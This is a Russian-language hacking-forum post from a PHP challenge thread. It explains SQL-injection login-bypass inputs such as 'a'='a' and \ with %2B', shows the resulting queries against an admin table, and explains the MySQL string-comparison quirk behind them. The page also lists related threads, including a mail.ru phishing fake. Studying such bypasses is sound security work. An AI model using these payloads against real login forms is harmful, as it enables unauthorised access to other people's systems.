[PHP] ЗАДАНИЯ от Krist_ALL

#11

03.09.2009, 20:57

ElteRUS

Постоянный

Регистрация: 11.10.2007

Сообщений: 406

С нами: 9780227

Репутация: 1423

Цитата:

Сообщение от Gifts

ElteRUS Эээ, в рот мне ноги, я не понимаю почему это работает, но, ведь, работает

Код:

?login=\&password=%2B'

Хм, да это то, только своеобразно оформлено но сути не меняет, твой вариант даже круче ))
Я рассчитывал на такое:

Логин '='
Пароль '='

Либо так a'='a в логин и пароль. Давайте посмотрим на получившиеся запрос:

PHP код:


		
			
select * from `admin` where login = 'a'='a' and password = 'a'='a'

Такой запрос прокатит. Выполните у себя на локалхосте

PHP код:


		
			
Select * from mysql.user where user = 'a'='a';

Выведутся все записи таблицы. Ну тот факт, что mysql поддерживает прямое сравнение строк – известен. Но дальше круче )) Выполните такое

PHP код:


		
			
Select * from mysq.user where user = 'aasdfsdf'='usu';

И это прокатит. Хотя очевидно, что эти строки не равны.
Твой пример из той же оперы

Код:

select * from `admin` where login = '\' and password = '%2B''

Только здесь видно что кроме = может быть и +, а так же * - )))

Похожие темы

Тема

Автор

Раздел

Ответов

Последнее сообщение

[php] On-Line Фейк mail.ru

m0Hze

Уязвимости Mail-сервис

21.08.2013 09:10

SQL-Inj Finder by mr.The [Special for antichat] [PHP]

mr.The

PHP

07.08.2009 01:30

Задания

~Fenix~

Болталка

13.05.2006 11:03

Создать сделку

Продавец: ник или ID

Название сделки:

Сумма USDT:

Срок сделки, дней:

Кто платит комиссию:

Условия сделки:

После создания сделки средства будут зарезервированы в холде до завершения сделки.

Создать сделку

Мои сделки

Сделка